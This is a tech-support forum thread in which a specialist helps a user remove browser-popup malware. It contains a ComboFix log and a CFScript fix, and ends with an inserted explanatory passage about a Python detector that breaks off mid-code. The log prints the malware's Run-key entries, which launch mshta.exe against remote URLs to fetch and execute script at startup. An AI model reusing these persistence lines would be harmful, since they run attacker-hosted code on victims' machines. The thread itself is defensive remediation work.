2012-05-28 05:06 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{A66FBB99-C8AC-44BC-83F6-4037B1F477F7}\mpengine.dll
2012-05-23 20:07 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2012-05-22 05:16 . 2012-05-22 05:16 713784 ------w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
2012-05-22 05:09 . 2012-05-22 05:10 -------- d-----w- c:\program files\Microsoft Security Client
2012-05-19 08:37 . 2012-05-08 16:40 6737808 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
2012-05-19 05:43 . 2012-05-19 09:50 -------- d-----w- c:\programdata\vsint
2012-05-14 22:57 . 2012-03-20 23:28 53120 ----a-w- c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57 . 2012-03-30 12:39 914304 ----a-w- c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57 . 2012-03-29 13:39 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57 . 2012-02-01 15:10 1404928 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
2012-05-14 22:57 . 2012-02-01 15:10 936960 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2012-05-14 22:57 . 2012-02-29 13:41 1069056 ----a-w- c:\windows\system32\DWrite.dll
2012-05-14 22:57 . 2012-03-01 14:46 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57 . 2012-02-29 14:08 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
2012-05-14 22:57 . 2012-03-01 14:46 160768 ----a-w- c:\windows\system32\d3d10_1.dll
2012-05-14 22:57 . 2012-02-29 13:44 683008 ----a-w- c:\windows\system32\d2d1.dll
2012-05-14 22:56 . 2012-04-03 08:16 3550080 ----a-w- c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56 . 2012-04-03 08:16 3602816 ----a-w- c:\windows\system32\ntkrnlpa.exe
2012-05-14 22:56 . 2012-04-02 13:36 2044928 ----a-w- c:\windows\system32\win32k.sys
2012-05-09 04:58 . 2012-05-09 04:58 592824 ----a-w- c:\program files\Mozilla Firefox\gkmedias.dll
2012-05-09 04:58 . 2012-05-09 04:58 44472 ----a-w- c:\program files\Mozilla Firefox\mozglue.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-05-05 06:08 . 2012-04-07 05:22 419488 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2012-05-05 06:08 . 2011-06-14 22:11 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2012-04-04 19:56 . 2010-02-20 07:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-03-21 00:44 . 2012-03-21 00:44 74112 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44 . 2012-03-21 00:44 171064 ----a-w- c:\windows\system32\drivers\MpFilter.sys
2012-02-29 15:11 . 2012-04-14 06:43 5120 ----a-w- c:\windows\system32\wmi.dll
2012-02-29 15:11 . 2012-04-14 06:43 172032 ----a-w- c:\windows\system32\wintrust.dll
2012-02-29 15:09 . 2012-04-14 06:43 157696 ----a-w- c:\windows\system32\imagehlp.dll
2012-02-29 13:32 . 2012-04-14 06:43 12800 ----a-w- c:\windows\system32\drivers\fs_rec.sys
2012-05-09 04:58 . 2011-06-08 03:45 97208 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
2011-05-09 08:49 176936 ----a-w- c:\program files\uTorrentControl\prxtbuTor.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1" [?]
"RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP" [?]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
"Skytel"="Skytel.exe" [2007-05-29 1826816]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
"00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
"DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Metacafe.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
backup=c:\windows\pss\Metacafe.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
backup=c:\windows\pss\Microsoft Office.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^GAGAN^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
path=c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
mshta.exe http://mistymodel.info/set_inf2.php?...u6qNCcCsJqkMCP [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
mshta.exe http://mistymodel.info/reg2.php?ccci...CsJqkMCP&log=1 [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HWSetup]
\HWSetup.exe hwSetUP [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
mshta [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
2011-12-13 04:20 3305760 ----a-w- c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2012-02-21 01:28 59240 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Camera Assistant Software]
2007-04-10 23:40 413696 ----a-w- c:\program files\Camera Assistant Software for Toshiba\traybar.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtamon]
2010-02-10 12:39 16040 ----a-w- c:\program files\Dell V305\dldtamon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtmon.exe]
2010-02-10 12:39 672424 ----a-w- c:\program files\Dell V305\dldtmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EPSON WorkForce 30 Series]
2007-11-26 21:00 188928 ----a-w- c:\windows\System32\spool\drivers\w32x86\3\E_FATIEEA.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\googletalk]
2007-01-01 21:22 3739648 ----a-w- c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HSON]
2006-12-07 23:49 55416 ----a-w- c:\program files\Toshiba\TBS\HSON.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2012-03-27 09:09 421736 ----a-w- c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KeNotify]
2006-11-07 00:14 34352 ----a-w- c:\program files\Toshiba\Utilities\KeNotify.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NBAgent]
2009-06-18 07:08 1062184 ----a-w- c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Pando Media Booster]
2009-02-27 06:22 2785608 ----a-w- c:\program files\Pando Networks\Media Booster\PMB.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2011-10-24 19:28 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RtHDVCpl]
2007-06-13 17:11 4489216 ----a-w- c:\windows\RtHDVCpl.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skytel]
2007-05-29 00:39 1826816 ----a-w- c:\windows\SkyTel.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SmoothView]
2007-03-22 18:46 448632 ----a-w- c:\program files\Toshiba\SmoothView\SmoothView.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Speech Recognition]
2008-01-19 07:33 49664 ----a-w- c:\windows\Speech\Common\sapisvr.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
2006-11-10 16:35 90112 ----a-w- c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SVPWUTIL]
2006-03-23 04:42 438272 ----a-w- c:\program files\Toshiba\Utilities\SVPWUTIL.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
2009-03-20 11:36 1451304 ----a-w- c:\program files\Synaptics\SynTP\SynTPEnh.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPwrMain]
2007-03-29 17:39 411192 ----a-w- c:\program files\Toshiba\Power Saver\TPwrMain.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VeohPlugin]
2011-06-30 10:11 2648184 ----a-w- c:\program files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring"=dword:00000001
.
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2012-05-28 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
.
2012-05-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2012-05-29 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
- c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://search.imesh.com/
mStart Page = hxxp://home.sweetim.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
LSP: c:\windows\system32\wpclsp.dll
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
.
- - - - ORPHANS REMOVED - - - -
.
WebBrowser-{EEE6C35B-6118-11DC-9C72-001320C79847} - (no file)
WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
MSConfigStartUp-BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA} - c:\program files\Common Files\Nero\Lib\NMBgMonitor.exe
MSConfigStartUp-CTFMon - c:\windows\system32\CTF\ctfmon.exe
MSConfigStartUp-fcconf - c:\users\GAGAN\AppData\Local\Temp\dns-hone.dll
MSConfigStartUp-InCD - c:\program files\Nero\Nero8\InCD\InCD.exe
MSConfigStartUp-NDSTray - NDSTray.exe
MSConfigStartUp-NeroFilterCheck - c:\program files\Common Files\Nero\Lib\NeroCheck.exe
MSConfigStartUp-SecurDisc - c:\program files\Nero\Nero8\InCD\NBHGui.exe
MSConfigStartUp-SiteAdvisor - c:\program files\SiteAdvisor\6172\SiteAdv.exe
MSConfigStartUp-Swusukukasega - c:\users\GAGAN\AppData\Local\ocopodatodejex.dll
MSConfigStartUp-TkBellExe - c:\program files\Common Files\Real\Update_OB\realsched.exe
MSConfigStartUp-YSearchProtection - c:\program files\Yahoo!\Search Protection\SearchProtection.exe
AddRemove-Akamai - c:\program files\common files\akamai\uninstall.exe
AddRemove-WinImage - c:\users\GAGAN\Desktop\winima81\winimage.exe
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2012-05-28 22:49
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.aif\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.aifc\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.aiff\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.au\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.flac\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.m3u\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.mid\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.midi\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.mp3\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.ogg\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.pcm\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.pls\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.snd\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.spx\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.wav\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.wma\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
@Denied: (Read) (RestrictedCode)
@Denied: (Read) (LocalSystem)
@Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Read) (Administrators)
@SACL=(02 0001)
@Ace=(0x11) (1) (S-1-16-4096)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
@SACL=(02 0001)
"lastact"=dword:00003640
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHistory]
@SACL=(02 0001)
"srch_ebox"=dword:4785b178
"srch_hlt"=dword:47854ece
"clkstrm"=dword:4785b2dc
"boo"=dword:4785b2dc
"etpg70_21"=dword:47854ece
"sst"=dword:47854ecf
"mess"=dword:4785b2dc
"mess_off"=dword:4785b2dc
"yma"=dword:47854eda
"mus"=dword:47854edb
"wik"=dword:47854edb
"vis_srch70"=dword:4785abea
"cacheldr"=dword:4785b2dc
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistory]
@SACL=(02 0001)
"srch"=dword:4785abec
"vis_srch70"=dword:4785abec
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
@SACL=(02 0001)
"LastPoll_200"=dword:00041537
"resfeed"=dword:00000002
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
"InstallStarted"=dword:00000000
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
"DisplayName"="jlGui 3.0"
"DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\57\\573addb9-2492e35c.ico"
"NoModify"=dword:00000001
"NoRepair"=dword:00000001
"Publisher"="Music Player for the Java(tm) Platform"
"Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
"URLInfoAbout"="http://www.javazoom.net"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"bgu0fw0tDZx8jtqEjccbDg==
"=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
96
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta]
@Denied: (Full) (Administrators)
@Denied: (Full) (Owner)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (Administrators)
@Denied: (Full) (Users)
@SACL=
"PerceivedType"="text"
@="htafile"
"Content Type"="application/hta"
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
@="{eec97550-47a9-11cf-b952-00aa0051fe20}"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
Completion time: 2012-05-28 22:55:51
ComboFix-quarantined-files.txt 2012-05-29 02:55
.
Pre-Run: 28,398,157,824 bytes free
Post-Run: 28,481,286,144 bytes free
.
- - End Of File - - 81C424733602C9A0DE9C0999B8DD65AF
gagraptor (THREAD STARTER; Member with 31 posts; Join Date: May 2012; Experience: Beginner)
28-May-2012, 11:04 PM #10
Torrents not in use.
gagraptor (THREAD STARTER; Member with 31 posts; Join Date: May 2012; Experience: Beginner)
28-May-2012, 11:18 PM #11
The problem seems partially solved. Now I have blank windows popping up. They have a web address at the top: http://silentmode.net/reg2php?cccid=...u6qncccsjqkmcp
gagraptor (THREAD STARTER; Member with 31 posts; Join Date: May 2012; Experience: Beginner)
28-May-2012, 11:29 PM #12
I guess it's not. It's back again.
Mark1956 (Malware Removal Specialist with 14,074 posts; Join Date: May 2011; Location: Spain; Experience: Advanced)
29-May-2012, 11:10 AM #13
No surprise with that. I was not sure if ComboFix would clear the problem, but it has given more information to work from; this fix should clear it. There will be a few more things to do once the problem of the popups has gone, so please stick with me until I say we are done.

We are now going to run ComboFix a different way.
Open Notepad by clicking on and in the Search box type: Notepad.exe and hit Enter.
Copy and paste everything in the code box below into it.
-- Note: Make sure Word Wrap is unchecked in Notepad by clicking on Format in the top menu.
Code:
Killall::
Registry::
[-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
[-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
[-HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"=-
"RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"=-
Reboot::
  • Save the file as CFScript.txt by choosing Save As... in the File Menu, and save it to your Desktop where the ComboFix icon is also located.
  • Close your browser and disconnect from the Internet.
  • Now use your mouse to drag, then drop the CFScript.txt file on top of ComboFix.exe as seen in the image below.
  • This will start ComboFix again and launch the script.
  • ComboFix may reboot your system when it finishes. This is normal.
  • A log will be created just as before and saved to C:\ComboFix.txt. Please copy and paste the contents of ComboFix.txt in your next reply.
  • Be sure to re-enable your anti-virus and other security programs after the scan is complete.
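The fix above works from two facts in the earlier log: a value under the user's Run key that starts mshta.exe with a remote URL, and a matching copy of that entry under the msconfig startupreg backup key. As an added example (not code from this thread, from Mark1956 or from ComboFix), the following Python reads the "Reg Loading Points" Run entries of a ComboFix-style log, flags values that hand a script host such as mshta.exe a URL or that autorun a DLL from a user-writable directory, and drafts a CFScript in the same Killall:: / Registry:: / Reboot:: shape as the one posted above. The sample log text, the value name SystemBootEXAMPLE, the example.invalid URL and the dates and sizes are constructed for illustration; the regexes assume the line format shown in the logs on this page.

```python
"""Flag script-host persistence in a ComboFix 'Reg Loading Points' dump and draft
the matching CFScript. Added example; not ComboFix's code or the thread's."""
import re

# ComboFix prints each Run key as a bracketed header, then one value per line:
#   "Name"="c:\path\prog.exe" [2012-01-01 12345]
KEY_RE = re.compile(r"^\[(?P<key>HKEY_[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<cmd>[^"]*)"(?:\s+\[[^\]]*\])?$')

# Signed Windows script hosts that run whatever argument they are given,
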